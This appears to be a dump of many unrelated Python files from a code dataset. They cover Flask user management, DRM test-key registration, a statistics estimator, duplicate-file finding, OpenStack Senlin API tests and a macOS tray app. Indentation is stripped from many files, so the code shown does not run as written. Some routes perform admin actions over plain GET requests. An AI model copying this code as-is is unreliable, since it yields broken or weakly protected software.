user = Users(username=form.username.data,email=form.email.data,specialties=form.specialties.data.split(','),interests=form.interests.data.split(','))
user.password = form.password.data
user.save()
token = user.generate_confirmation_token()
send_email(user.email,'Confirmare email','users/email/confirm',user=user,token=token)
flash('Contul a fost adaugat! Va rugam confirmati adresa de email!', category='alert-success')
except Exception as err:
flash('Contul nu poate fi creat!', category='alert-warning')
return redirect(url_for('users.login'))
return render_template('users/login.html',pagetitle='Inregistrare',form=form,login=False)
@mod.route('/reseteazaparola/', methods=['GET','POST'])
def resetlink():
form = ResetPassForm()
if form.validate_on_submit():
try:
user = Users.objects(email=form.email.data).get()
token = user.generate_reset_token()
send_email(user.email,'Resetare parola','/users/email/passwdreset',user=user,token=token)
flash('Parola a fost resetata! Va rugam urmati instructiunile primite pe email!',category='alert-success')
return redirect(request.referrer)
except Exception as err:
flash('Adresa de email nu exista!',category='alert-danger')
return redirect(request.referrer)
return render_template('users/login.html',pagetitle='Resetare parola',form=form,login=False)
@mod.route('/reseteaza/<email>/<token>', methods=['GET','POST'])
def resetpassword(email,token):
form = NewPassForm()
if form.validate_on_submit():
try:
user = Users.objects(email=email).get()
if user.id == user.resetpass(token):
user.password = form.password.data
user.save()
flash('Parola schimbata!',category='alert-success')
return redirect(url_for('users.login'))
else:
raise Exception
except:
flash('Token invalid!',category='alert-danger')
return redirect(url_for('users.resetlink'))
return render_template('users/login.html',pagetitle='Resetare parola',form=form,login=False)
@mod.route('/confirmaemail/<token>')
@login_required
def confirmemail(token):
if g.user.mail_confirmed:
return redirect(request.args.get('next') or url_for('users.edituser'))
if g.user.confirm(token):
flash('Adresa de email confirmata!',category='alert-success')
else:
flash('Token expirat sau invalid!',category='alert-danger')
return redirect(request.args.get('next') or url_for('users.edituser'))
@mod.route('/lista')
@login_required
def list():
""" Build the view used to list all existing accounts """
results = [x for x in Users.objects()]
return render_template('users/list.html',results=results)
@mod.route('/adauga', methods=['GET','POST'])
@admin_required
@login_required
def adduser():
""" Build the view used to add new accounts """
form = RegisterForm()
if form.validate_on_submit():
try:
user = Users(username=form.username.data,email=form.email.data,specialties=form.specialties.data.split(','),interests=form.interests.data.split(','))
user.password = form.password.data
user.save()
token = user.generate_confirmation_token()
send_email(user.email,'Confirmare email','users/email/confirm',user=user,token=token)
flash('Contul a fost adaugat!', category='alert-success')
except Exception as err:
flash('Utilizatorul are deja cont!', category='alert-warning')
return redirect(url_for('users.list'))
return render_template('users/add.html',pagetitle='Adauga utilizator',form=form)
@mod.route('/editeaza/', methods=['GET','POST'])
@login_required
def edituser():
""" Build the view used to edit existing accounts """
user = Users.objects(id=unicode(g.user.id)).get()
form = UserForm()
if form.validate_on_submit():
user.username = form.username.data
if form.avatar.data:
            image_data = request.files[form.avatar.name].read()
user.avatar = image_data
user.email = form.email.data
user.specialties = form.specialties.data.split(',')
user.interests = form.interests.data.split(',')
user.save()
flash('Cont modificat!',category='alert-success')
return redirect(request.referrer)
form.username.data = user.username
form.email.data = user.email
form.avatar.data = ''
form.specialties.data = ','.join(user.specialties)
form.interests.data = ','.join(user.interests)
return render_template('users/add.html',pagetitle='Editeaza utilizator',form=form)
@mod.route('/editeazaparola/', methods=['GET','POST'])
@login_required
def editpswduser():
""" Build the view used to edit a password for an existing account """
user = Users.objects(id=unicode(g.user.id)).get()
form = PasswordForm()
if form.validate_on_submit() and user.verify_password(form.oldpasswd.data):
user.password = form.password.data
user.save()
flash('Parola modificata!', category='alert-success')
return redirect(request.referrer)
return render_template('users/add.html',pagetitle='Editeaza parola',form=form)
@mod.route('/detalii/<id>')
@login_required
def detailuser(id):
user = Users.objects(id=id).get()
results = [(Users.username.verbose_name,user.username),(Users.specialties.verbose_name,','.join(user.specialties)),(Users.interests.verbose_name,','.join(user.interests))]
return render_template('users/details.html',pagetitle='Detalii utilizator',results=results)
@mod.route('/ajaxedit/<action>/<id>', methods=['GET'])
@admin_required
@login_required
def ajaxedit(action,id):
user = Users.objects(id=id).get()
if action == 'delete' and id != unicode(g.user.id):
user.delete()
if action == 'mkadmin' and id != unicode(g.user.id):
user.permissions = 'full'
user.save()
if action == 'mkuser' and id != unicode(g.user.id):
user.permissions = 'user'
user.save()
if action == 'deactivate' and id != unicode(g.user.id):
user.status = False
user.save()
if action == 'activate' and id != unicode(g.user.id):
user.status = True
user.save()
return redirect(request.referrer)
|
nilq/baby-python
|
python
|
import argparse
import os
import zipfile
def make_rel_archive(a_args):
    # Context manager guarantees the archive is flushed and closed
    with zipfile.ZipFile("(Part 1) Engine Fixes.zip", "w", zipfile.ZIP_DEFLATED) as archive:
        def do_write(a_path):
            archive.write(a_path, "SKSE/Plugins/{}".format(os.path.basename(a_path)))
        def write_rootfile(a_extension):
            do_write("{}/{}{}".format(a_args.src_dir, a_args.name, a_extension))
        do_write(a_args.dll)
        write_rootfile("_preload.txt")
        write_rootfile("_SNCT.toml")
        write_rootfile(".toml")
def make_dbg_archive(a_args):
    with zipfile.ZipFile("{}_pdb.zip".format(a_args.name), "w", zipfile.ZIP_DEFLATED) as archive:
        archive.write(a_args.pdb, os.path.basename(a_args.pdb))
def parse_arguments():
parser = argparse.ArgumentParser(description="archive build artifacts for distribution")
parser.add_argument("--dll", type=str, help="the full dll path", required=True)
parser.add_argument("--name", type=str, help="the project name", required=True)
parser.add_argument("--out-dir", type=str, help="the output directory", required=True)
parser.add_argument("--pdb", type=str, help="the full pdb path", required=True)
parser.add_argument("--src-dir", type=str, help="the project root source directory", required=True)
return parser.parse_args()
def main():
args = parse_arguments()
os.makedirs(args.out_dir, exist_ok=True)
os.chdir(args.out_dir)
make_rel_archive(args)
make_dbg_archive(args)
if __name__ == "__main__":
main()
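# Example invocation (script name and paths are illustrative, not from the source):
#   python archive_artifacts.py --dll build/EngineFixes.dll --name EngineFixes \
#       --out-dir dist --pdb build/EngineFixes.pdb --src-dir src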
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
## Create Microsoft Test Server DRM keys, parse LAURL array
## python.exe RegisterDRM_MicrosoftTest.py > keys_microsofttest.json
## Aki Nieminen/Sofia Digital
## 2017-11-30/Aki: changed hexdecode to python3
## 2017-08-21/Aki: initial release
import sys, os, time, datetime, json, base64
from optparse import OptionParser
def registerPlayready(drmType, auth, kid, enckey):
now = datetime.datetime.utcnow() + datetime.timedelta(minutes=120)
url="https://test.playready.microsoft.com/service/rightsmanager.asmx"
params = "cfg=(kid:header,sl:2000,persist:false,firstexp:%s,contentkey:%s)" % (
60*1, ##expiration(seconds) on first play
##now.strftime('%Y%m%d%H%M%S'), ##expiration:20170921000000
#base64.b64encode(enckey.decode('hex'))
base64.b64encode(bytearray.fromhex(enckey)).decode("ISO-8859-1")
)
return url + "?" + params
def register(drmType, auth, kid, enckey):
if kid.startswith("0x"): kid = kid[2:]
if enckey.startswith("0x"): enckey = enckey[2:]
obj={}
obj["kid"]=kid
obj["key"]=enckey ## real production system should keep KEY value secret !!
obj["playready"]=registerPlayready(drmType, auth, kid, enckey)
obj["b64kid"]=base64.b64encode(bytearray.fromhex(kid)).decode("ISO-8859-1")
obj["b64key"]=base64.b64encode(bytearray.fromhex(enckey)).decode("ISO-8859-1")
	return obj
##############################
##############################
class DRM_TYPE: ## enum
TEST=0
PROD=1
def main():
## parse command line arguments
parser = OptionParser(add_help_option=False)
parser.add_option("-h", "--help", action="help")
parser.add_option("--authtest", type="string", dest="authtest", help="Authentication key for test service (not used)")
(options, args) = parser.parse_args()
## Register KID and ENCKEY values to license service
now = datetime.datetime.utcnow()
obj={}
obj["created"]=now.strftime('%Y-%m-%dT%H:%M:%SZ')
obj["Test1234"]=register(DRM_TYPE.TEST, options.authtest, "0x43215678123412341234123412341234", "0x12341234123412341234123412341234")
obj["Test1235"]=register(DRM_TYPE.TEST, options.authtest, "43215678123412341234123412341235", "12341234123412341234123412341235")
obj["Test1236"]=register(DRM_TYPE.TEST, options.authtest, "43215678123412341234123412341236", "12341234123412341234123412341236")
obj["Test1237"]=register(DRM_TYPE.TEST, options.authtest, "43215678123412341234123412341237", "12341234123412341234123412341237")
obj["Test1238"]=register(DRM_TYPE.TEST, options.authtest, "43215678123412341234123412341238", "12341234123412341234123412341238")
obj["Test1239"]=register(DRM_TYPE.TEST, options.authtest, "43215678123412341234123412341239", "12341234123412341234123412341239")
obj["Test148D"]=register(DRM_TYPE.TEST, options.authtest, "5A461E692ABF5534A30FFC45BFD7148D", "307F7B3F5579BEF53894A6D946762267")
obj = json.dumps(obj, indent=2, sort_keys=True, ensure_ascii=False)
print (obj)
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
from .face_utils import align_crop_face_landmarks, compute_increased_bbox, get_valid_bboxes, paste_face_back
from .misc import img2tensor, load_file_from_url, scandir
__all__ = [
'align_crop_face_landmarks', 'compute_increased_bbox', 'get_valid_bboxes', 'load_file_from_url', 'paste_face_back',
'img2tensor', 'scandir'
]
|
nilq/baby-python
|
python
|
import numpy as np
def AdjHE_estimator(A,data, npc=0, std=False):
    # remove identifiers from y for linear algebra
y = data.Residual
# select PC columns
PC_cols = [ col.startswith("PC") for col in data ]
PCs = data.iloc[:, PC_cols]
# If standardized AdjHE is chosen
if (std == True) :
# Standardize the y
std_y = (y-np.mean(y))/np.std(y)
trA = np.sum(np.diag(A))
trA2 = np.sum(np.multiply(A,A))
n = A.shape[1]
yay = np.dot(std_y.T, np.dot(A,std_y)).flatten()
yty = np.dot(std_y.T, std_y).flatten()
        if (npc==0):
            denominator = trA2 - 2*trA + n
            numerator = n - trA + yay - yty
        else:
            pc = PCs
            s = np.diag(np.dot(pc.T,np.dot(A,pc)))
            b = s - 1
            c = np.dot(std_y.T, pc)**2 - 1
            denominator = trA2 - 2*trA + n - np.sum(b**2)
            numerator = n - trA + yay - yty - np.sum(b*c)
        h2 = numerator/denominator
h2 = h2[0]
var_ge = 2/denominator
# tau = n/nmarkers
# b1 = (1-np.sqrt(tau))**2
# b2 = (1+np.sqrt(tau))**2
# r = b2-b1
# a1 = h2-1
# a2 = 1-2*h2
# trace_A2_MP = 0.5*(r+2*b1)*n
# trace_A3_MP = (5/16*r**2+b1*b2)*n
# trace_A4_MP = (7*r**3+30*b1*r**2+48*b1**2*r+32*b1**3)/32*n
# if (npc==0):
# # var_MP = 2/denominator
# var_ge = 2/denominator
# else:
# trace_A_MP = trA - np.sum(s)
# a = denominator
# # var_MP=2/a**2*(h2**2*trace_A4_MP+(n-npc)*a1**2+(a2**2+2*h2*a1)*trace_A2_MP+2*a1*a2*trace_A_MP+2*h2*a2*trace_A3_MP)
# var_ge = 2/a
else :
# else we solve the unstandardized version
trA2 = np.sum(np.multiply(A,A))
trA = np.sum(np.diag(A))
n = A.shape[1]
yay = np.dot(y.T, np.dot(A,y)).flatten()
yty = np.dot(y.T, y).flatten()
tn = np.sum(y)**2/n # all 1s PC
if (npc==0):
sigg = n*yay - trA*yty
sigg = sigg-yay+tn*trA # add 1's
sige = trA2*yty - trA*yay
sige = sige-tn*trA2 # add 1's
denominator = trA2 - 2*trA + n
else:
# remove identifiers for linear algebra
pc = PCs
pcA = np.dot(pc.T,A)
pcApc = np.dot(pcA,pc)
s = np.diag(pcApc) #pciApci
b = s-1
t = np.dot(y.transpose(),pc)**2 #ypcipciy
a11 = trA2 - np.sum(s**2)
a12 = trA - np.sum(s)
b1 = yay - np.sum(s*t)
b2 = yty - np.sum(t)
sigg = (n-npc)*b1 - a12*b2
sigg = sigg.flatten() - yay.flatten() + tn * a12 # add 1's
sige = a11*b2 - a12*b1
sige = sige.flatten()-tn*a11 # add 1's
denominator = trA2 - 2*trA + n - np.sum(b**2)
h2 = sigg/(sigg+sige)
var_ge = 2/denominator
return h2,np.sqrt(var_ge)
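# Usage sketch (shapes assumed, not from the source): A is an n x n GRM-style
# matrix, `data` a DataFrame with a Residual column and PC1..PCk columns:
#   h2, se = AdjHE_estimator(A, data, npc=2, std=True)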
|
nilq/baby-python
|
python
|
import os, sys, hashlib, argparse
BLOCK_SIZE = 65536
def calculateFileHash(path):
hasher = hashlib.md5()
with open(path, 'rb') as targetFile:
buffer = targetFile.read(BLOCK_SIZE)
while len(buffer) > 0:
hasher.update(buffer)
buffer = targetFile.read(BLOCK_SIZE)
return hasher.hexdigest()
def isFileNonEmpty(path):
return os.path.getsize(path) > 0
def getDuplicatesInFolderByHash(folder):
filesDict = {}
for dirName, subDirs, fileList in os.walk(folder):
print('Scanning folder ' + dirName + " - By hash")
for filename in fileList:
path = os.path.join(dirName, filename)
if(isFileNonEmpty(path)):
fileHash = calculateFileHash(path)
if fileHash in filesDict:
filesDict[fileHash].append(path)
else:
filesDict[fileHash] = [path]
else:
print("Skipping empty file " + path)
return filesDict
def getDuplicatesInFolderByFilename(folder):
filesDict = {}
for dirName, subDirs, fileList in os.walk(folder):
print('Scanning folder ' + dirName + " - By filename")
for filename in fileList:
path = os.path.join(dirName, filename)
if(isFileNonEmpty(path)):
if filename in filesDict:
filesDict[filename].append(path)
else:
filesDict[filename] = [path]
else:
print("Skipping empty file " + path)
return filesDict
def processResult(filesDict):
values = filesDict.values()
foundDuplicates = False
for fileOccurs in values:
if(len(fileOccurs) > 1):
fileName= os.path.basename(fileOccurs[0])
foundDuplicates = True
print("\nFound duplicate " + fileName + " at:")
for f in fileOccurs:
print(f)
if foundDuplicates == False:
print("No duplicates found")
def parseArguments():
parser = argparse.ArgumentParser(description='Duplicates Finder Parameters')
parser.add_argument('-V', '--version', action='version', version='0.0.1')
parser.add_argument("-d", "--dir", help="Supplied directory to navigate", type=str, required = True)
parser.add_argument("-f", "--byfilename", help="Compare files by filename instead of hash", dest='byfilename', action='store_true')
parser.set_defaults(byfilename=False)
return parser.parse_args()
def findDuplicates(args):
if args.dir:
folderPath = args.dir
if os.path.exists(folderPath):
if args.byfilename:
filesDict = getDuplicatesInFolderByFilename(folderPath)
else:
filesDict = getDuplicatesInFolderByHash(folderPath)
processResult(filesDict)
else:
print("The supplied directory does not exist")
else:
print("Please supply target directory using --dir")
if __name__ == '__main__':
args = parseArguments()
findDuplicates(args)
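# Example invocations (script name is illustrative):
#   python find_duplicates.py --dir /path/to/photos       # compare by MD5 hash
#   python find_duplicates.py --dir /path/to/photos -f    # compare by filename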
|
nilq/baby-python
|
python
|
import os
import torch
import numpy as np
from sentence_transformers import SentenceTransformer
from experiment.qa.evaluation import BasicQAEvaluation
class QAEvaluationSBert(BasicQAEvaluation):
def __init__(self, config, config_global, logger):
super(QAEvaluationSBert, self).__init__(config, config_global, logger)
os.environ['TORCH_HOME'] = config["sbert"]["cache_dir"]
self.model = SentenceTransformer(config["sbert"]["model"])
self.batch_size = config["batchsize"]
def start(self, model, data, valid_only=False):
return super(QAEvaluationSBert, self).start(model, data, valid_only)
def score(self, qa_pairs, model, data, tasks):
query_examples = [q.text for (q, _, _) in qa_pairs]
doc_examples = [a.text for (_, a, _) in qa_pairs]
repr_queries = torch.from_numpy(np.stack(self.model.encode(query_examples, batch_size=self.batch_size, show_progress_bar=False)))
repr_docs = torch.from_numpy(np.stack(self.model.encode(doc_examples, batch_size=self.batch_size, show_progress_bar=False)))
scores = torch.cosine_similarity(repr_queries, repr_docs)
return scores.cpu().numpy(), np.zeros(1)
component = QAEvaluationSBert
|
nilq/baby-python
|
python
|
"""Test Home Assistant ulid util methods."""
import uuid
import homeassistant.util.ulid as ulid_util
async def test_ulid_util_uuid_hex():
"""Verify we can generate a ulid."""
assert len(ulid_util.ulid_hex()) == 32
assert uuid.UUID(ulid_util.ulid_hex())
|
nilq/baby-python
|
python
|
from flask import Flask, render_template, request, Response
from Models import db, SensorData, CustomSensor
from flask.json import jsonify
from Arduino import serial_port
from threading import Thread
from Helpers import search_sensor
from Constants import DataTypes
import os.path
# Build the database URI relative to this file; note os.path.join cannot be
# used to prepend the 'sqlite:///' scheme, so it is concatenated instead.
db_path = 'sqlite:///' + os.path.join(os.path.dirname(os.path.abspath(__file__)), 'database.sqlite')
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = db_path
db.init_app(app)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/api/query', methods=['GET'])
def query():
headers = dict()
cs = CustomSensor.query.all()
sensors = [name for name in dir(SensorData) if name.startswith('sensor_')]
for sensor in sensors:
row = search_sensor(sensor, cs)
if row is None:
headers[sensor] = sensor
else:
headers[sensor] = row.name
data = [x.to_json() for x in SensorData.query.all()]
return jsonify(data=data, headers=headers)
@app.route('/api/get_custom_sensor', methods=['GET'])
def get_custom_sensors():
return_list = list()
data = CustomSensor.query.all()
sensors = [name for name in dir(SensorData) if name.startswith('sensor_')]
for sensor in sensors:
row = search_sensor(sensor, data)
if row is None:
return_list.append(dict(name='', formula='', data_type=0, sensor_field=sensor))
else:
return_list.append(dict(name=row.name, data_type=row.data_type, formula=row.formula, sensor_field=row.sensor_field))
return jsonify(sensors=return_list)
@app.route('/api/get_available_sensors', methods=['GET'])
def get_available_sensors():
data = [name for name in dir(SensorData) if name.startswith('sensor_')]
return jsonify(sensors=data)
@app.route('/api/save_custom_sensors', methods=['POST'])
def save_custom_sensors():
data = request.get_json()
sensors = CustomSensor.query.all()
for sensor in data:
row = search_sensor(sensor['sensor_field'], sensors)
if row is None:
cs = CustomSensor(None, None, sensor['name'], sensor['sensor_field'], sensor['formula'], sensor['data_type'])
db.session.add(cs)
else:
row.name = sensor['name']
row.formula = sensor['formula']
row.data_type = sensor['data_type']
db.session.commit()
return Response(status=200)
@app.route('/api/get_data_types', methods=['GET'])
def get_data_types():
return jsonify(types=[dict(name=key.title(), value=DataTypes.__dict__[key]) for key in DataTypes.__dict__ if not key.startswith('__')])
if __name__ == '__main__':
t = Thread(target=serial_port, args=(2, ))
t.daemon = False
# t.start()
app.run()
|
nilq/baby-python
|
python
|
#basic program for finding the SECOND LARGEST VALUE among a given list of values
#in other words, finding the RUNNER UP
#uses map(), split() and sorted()
#sorted() returns a new sorted list built from the given iterable; set() removes duplicates first
if __name__ == '__main__':
#getting the number of scores you are going to enter
n = int(input("Enter number of scores : "))
#using map() and split() function to get the no.of.scores
arr = map(int,input("\nEnter the scores : ").split())
    #deduplicate with set(), sort ascending, then index [-2] to take the next-to-last (second largest) value
print ("The RUNNER UP IS:",(sorted(set(arr))[-2]))
|
nilq/baby-python
|
python
|
from collections import namedtuple
ButtonOptions = namedtuple('ButtonOptions',
['activebackground', 'activeforeground', 'anchor', 'background', 'bitmap', 'borderwidth',
'disabledforeground', 'font', 'foreground', 'highlightbackground', 'highlightcolor',
'highlightthickness', 'image', 'justify', 'padx', 'pady', 'relief', 'repeatdelay',
'repeatinterval', 'takefocus', 'textvariable', 'underline', 'wraplength', 'compound',
'default', 'height', 'cursor', 'overrelief', 'state', 'width'])
ButtonOptions.__new__.__defaults__ = (None,) * len(ButtonOptions._fields)
ScaleOptions = namedtuple('ScaleOptions',
['activebackground', 'background', 'bigincrement', 'bd', 'bg', 'borderwidth', 'cursor',
'digits', 'fg', 'font', 'foreground', 'highlightbackground', 'highlightcolor',
'highlightthickness', 'length', 'orient', 'relief', 'repeatdelay', 'repeatinterval',
'resolution', 'showvalue', 'sliderlength', 'sliderrelief', 'state', 'takefocus',
'tickinterval', 'troughcolor', 'variable', 'width'])
ScaleOptions.__new__.__defaults__ = (None,) * len(ScaleOptions._fields)
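# Usage sketch: unspecified fields fall back to the None defaults, e.g.
#   opts = ButtonOptions(background='white', width=10)
#   assert opts.background == 'white' and opts.cursor is None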
|
nilq/baby-python
|
python
|
"""Constants for the Thruk Livestatus sensor integration."""
# This is the internal name of the integration, it should also match the directory
# name for the integration.
DOMAIN = "thruk_livestatus"
HOST_COUNT = "Host count"
NUM_SERVICES_CRIT = "Services CRITICAL"
NUM_SERVICES_WARN = "Services WARNING"
NUM_SERVICES_OK = "Services OK"
NUM_SERVICES_UNKNOWN = "Services UNKNOWN"
HOSTS_UP = "Hosts UP"
HOSTS_DOWN = "Hosts DOWN"
HOSTS_UNKNOWN = "Hosts UNKNOWN"
|
nilq/baby-python
|
python
|
import decoder
inp_fn = raw_input("Enter the file name to decode:")
sp_fn_a = inp_fn.split('.')
sp_fn_b = sp_fn_a[0].split('_')
inp_fs = open(inp_fn,"r")
out_fs = open("decoded_"+sp_fn_b[1]+'.'+sp_fn_b[2],"wb+")
enc_ln = int(inp_fs.readline())
st_to_dec = inp_fs.readline()
while st_to_dec!='':
out_fs.write(decoder.decode(enc_ln,int(st_to_dec)))
st_to_dec = inp_fs.readline()
out_fs.close()
inp_fs.close()
|
nilq/baby-python
|
python
|
"""Plants tests"""
|
nilq/baby-python
|
python
|
import time, sys, random
from pygame import mixer
from PyQt5.QtWidgets import QDialog, QApplication
from PyQt5 import QtWidgets, QtCore
from src.ui.controlPenalUI import Ui_controlPenal
from src.songScreen import picWindow
class controlPenal(QDialog):
def __init__(self):
super().__init__()
self.ui = Ui_controlPenal()
self.ui.setupUi(self)
self.ui.loadRound8.clicked.connect(self.setRound8)
self.ui.loadRound4.clicked.connect(self.setRound4)
self.ui.loadRoundFinal.clicked.connect(self.setRoundFinal)
self.ui.startPick.clicked.connect(self.startPick)
self.ui.clearTxt.clicked.connect(self.clearTxt)
self.ui.removeFromList.clicked.connect(self.removeFromList)
self.picW=picWindow()
self.picW.show()
self.pic=0
self.list=[]
self.show()
def closeEvent(self, event):
self.__del__()
def __del__(self):
self.picW.close()
    def setRound8(self):
        self.loadRoundFile("round8.txt")
    def setRound4(self):
        self.loadRoundFile("round4.txt")
    def setRoundFinal(self):
        self.loadRoundFile("roundfinal.txt")
    def loadRoundFile(self, filename):
        # Shared loader: one song name per line; the context manager closes the file
        self.list = []
        with open(filename, "r") as f:
            for line in f:
                self.list.append(line.rstrip())
        self.setTable()
def setTable(self):
self.ui.songList.setRowCount(0)
for row_number,content in enumerate(self.list):
self.ui.songList.insertRow(row_number)
self.ui.songList.setItem(row_number, 0, QtWidgets.QTableWidgetItem(str(content)))
def startPick(self):
mixer.init()
mixer.music.load("./song/opener.mp3")
mixer.music.play()
for i in range(0,62,2):
self.callRandomPic()
self.picW.updatePic(self.list[self.pic])
QApplication.processEvents()
print(self.list[self.pic])
time.sleep(0.01*i)
sound=mixer.Sound("./song/"+self.list[self.pic]+".wav")
time.sleep(2)
mixer.music.stop()
self.ui.result.setText(self.list[self.pic])
QApplication.processEvents()
sound.play()
f=open("result.txt","w")
f.write(self.list[self.pic])
f.close()
time.sleep(sound.get_length())
def callRandomPic(self):
rand=random.randint(0,len(self.list)-1)
while rand==self.pic:
rand=random.randint(0,len(self.list)-1)
self.pic=rand
def clearTxt(self):
self.picW.clearPic()
self.ui.result.setText("")
f=open("result.txt","w")
f.write("")
f.close()
def removeFromList(self):
pos=self.ui.songList.currentRow()
del self.list[pos]
self.setTable()
|
nilq/baby-python
|
python
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from tempest.lib import decorators
from tempest.lib import exceptions
from senlin_tempest_plugin.common import constants
from senlin_tempest_plugin.tests.api import base
class TestPolicyCreateNegativeBadRequest(base.BaseSenlinAPITest):
@decorators.attr(type=['negative'])
@decorators.idempotent_id('3fea4aa9-6dee-4202-8611-cf2d008a4d42')
def test_policy_create_policy_data_not_specified(self):
params = {
'policy': {
'name': 'test-policy'
}
}
# Verify badrequest exception(400) is raised.
ex = self.assertRaises(exceptions.BadRequest,
self.client.create_obj,
'policies', params)
message = ex.resp_body['error']['message']
self.assertEqual("'spec' is a required property", str(message))
@decorators.attr(type=['negative'])
@decorators.idempotent_id('4a4d6c83-f0fa-4c9e-914b-d89478903d95')
def test_policy_create_name_not_specified(self):
params = {
'policy': {
'spec': constants.spec_scaling_policy
}
}
# Verify badrequest exception(400) is raised.
ex = self.assertRaises(exceptions.BadRequest,
self.client.create_obj,
'policies', params)
message = ex.resp_body['error']['message']
self.assertEqual("'name' is a required property", str(message))
@decorators.attr(type=['negative'])
@decorators.idempotent_id('b898de6c-996a-4bc3-bdef-6490e62fb3b0')
def test_policy_create_invalid_param(self):
params = {
'policy': {
'name': 'bar',
'spec': {},
'boo': 'foo'
}
}
# Verify badrequest exception(400) is raised.
ex = self.assertRaises(exceptions.BadRequest,
self.client.create_obj,
'policies', params)
message = ex.resp_body['error']['message']
self.assertIn("Additional properties are not allowed", str(message))
@decorators.attr(type=['negative'])
@decorators.idempotent_id('1c0ed145-bca6-4e53-b222-44fc6978eb1f')
def test_policy_create_policy_type_incorrect(self):
spec = copy.deepcopy(constants.spec_scaling_policy)
spec['type'] = 'senlin.policy.bogus'
params = {
'policy': {
'name': 'test-policy',
'spec': spec
}
}
        # Verify notfound exception(404) is raised.
ex = self.assertRaises(exceptions.NotFound,
self.client.create_obj,
'policies', params)
message = ex.resp_body['error']['message']
self.assertEqual(
"The policy_type 'senlin.policy.bogus-1.0' could "
"not be found.", str(message))
@decorators.attr(type=['negative'])
@decorators.idempotent_id('f55dc7eb-9863-49c2-b001-368d2057c53c')
def test_policy_create_spec_validation_failed(self):
spec = copy.deepcopy(constants.spec_scaling_policy)
spec['properties']['bogus'] = 'foo'
params = {
'policy': {
'name': 'test-policy',
'spec': spec
}
}
        # Verify serverfault exception(500) is raised.
ex = self.assertRaises(exceptions.ServerFault,
self.client.create_obj,
'policies', params)
message = ex.resp_body['error']['message']
self.assertEqual("Unrecognizable spec item 'bogus'",
str(message))
|
nilq/baby-python
|
python
|
import sys
import argparse
import json
import logging
import os
from TrainFace import TrainFace
from InferFace import InferFace
if __name__ == "__main__":
# Read the input information by the user on the command line
parser = argparse.ArgumentParser()
parser.add_argument("--config_file", help="config path of model",
default=r"E:\3业余资料\10人脸性别分类\code\config\face.json")
parser.add_argument("--phase", default="train")
args = parser.parse_args()
model_file = args.config_file
with open(model_file, "r", encoding="UTF-8") as fr:
config = json.load(fr)
if args.phase == "train":
config["phase"] = "train"
if args.phase == "infer":
config["phase"] = "infer"
log_path = config["global"]["log_path"]
task = config["global"]["task"]
if log_path:
if not os.path.exists(os.path.dirname(log_path)):
os.makedirs(os.path.dirname(log_path))
logger = logging.getLogger(task)
logger.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
file_handler = logging.FileHandler(log_path, encoding="UTF-8")
file_handler.setLevel(logging.INFO)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
if args.phase == "train":
config["phase"] = "train"
TrainFace(config)
elif args.phase == "infer":
config["phase"] = "infer"
InferFace(config)
|
nilq/baby-python
|
python
|
class Solution(object):
def defangIPaddr(self, address):
"""
:type address: str
:rtype: str
"""
return address.replace(".", "[.]")
if __name__ == '__main__':
address = "0.0.0.0"
obj = Solution()
    print(obj.defangIPaddr(address))  # expected output: "0[.]0[.]0[.]0"
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# coding:utf-8
import os
import sys
current_path = os.path.dirname(os.path.abspath(__file__))
helper_path = os.path.join(current_path, os.pardir, os.pardir, os.pardir, 'data', 'launcher', 'helper')
if __name__ == "__main__":
python_path = os.path.abspath( os.path.join(current_path, os.pardir, 'python27', '1.0'))
noarch_lib = os.path.abspath( os.path.join(python_path, 'lib', 'noarch'))
sys.path.append(noarch_lib)
osx_lib = os.path.join(python_path, 'lib', 'darwin')
sys.path.append(osx_lib)
extra_lib = "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC"
sys.path.append(extra_lib)
import config
import module_init
import subprocess
import webbrowser
from xlog import getLogger
xlog = getLogger("launcher")
import AppKit
import SystemConfiguration
from PyObjCTools import AppHelper
class MacTrayObject(AppKit.NSObject):
def __init__(self):
pass
def applicationDidFinishLaunching_(self, notification):
setupHelper()
loadConfig()
self.setupUI()
self.registerObserver()
def setupUI(self):
self.statusbar = AppKit.NSStatusBar.systemStatusBar()
self.statusitem = self.statusbar.statusItemWithLength_(AppKit.NSSquareStatusItemLength) #NSSquareStatusItemLength #NSVariableStatusItemLength
# Set initial image icon
icon_path = os.path.join(current_path, "web_ui", "favicon-mac.ico")
image = AppKit.NSImage.alloc().initByReferencingFile_(icon_path.decode('utf-8'))
image.setScalesWhenResized_(True)
image.setSize_((20, 20))
self.statusitem.setImage_(image)
# Let it highlight upon clicking
self.statusitem.setHighlightMode_(1)
self.statusitem.setToolTip_("XX-Net")
# Get current selected mode
proxyState = getProxyState(currentService)
# Build a very simple menu
self.menu = AppKit.NSMenu.alloc().initWithTitle_('XX-Net')
menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Config', 'config:', '')
self.menu.addItem_(menuitem)
menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(getCurrentServiceMenuItemTitle(), None, '')
self.menu.addItem_(menuitem)
self.currentServiceMenuItem = menuitem
menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Enable Auto GAEProxy', 'enableAutoProxy:', '')
if proxyState == 'pac':
menuitem.setState_(AppKit.NSOnState)
self.menu.addItem_(menuitem)
self.autoGaeProxyMenuItem = menuitem
menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Enable Global GAEProxy', 'enableGlobalProxy:', '')
if proxyState == 'gae':
menuitem.setState_(AppKit.NSOnState)
self.menu.addItem_(menuitem)
self.globalGaeProxyMenuItem = menuitem
menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Enable Global X-Tunnel', 'enableGlobalXTunnel:', '')
if proxyState == 'x_tunnel':
menuitem.setState_(AppKit.NSOnState)
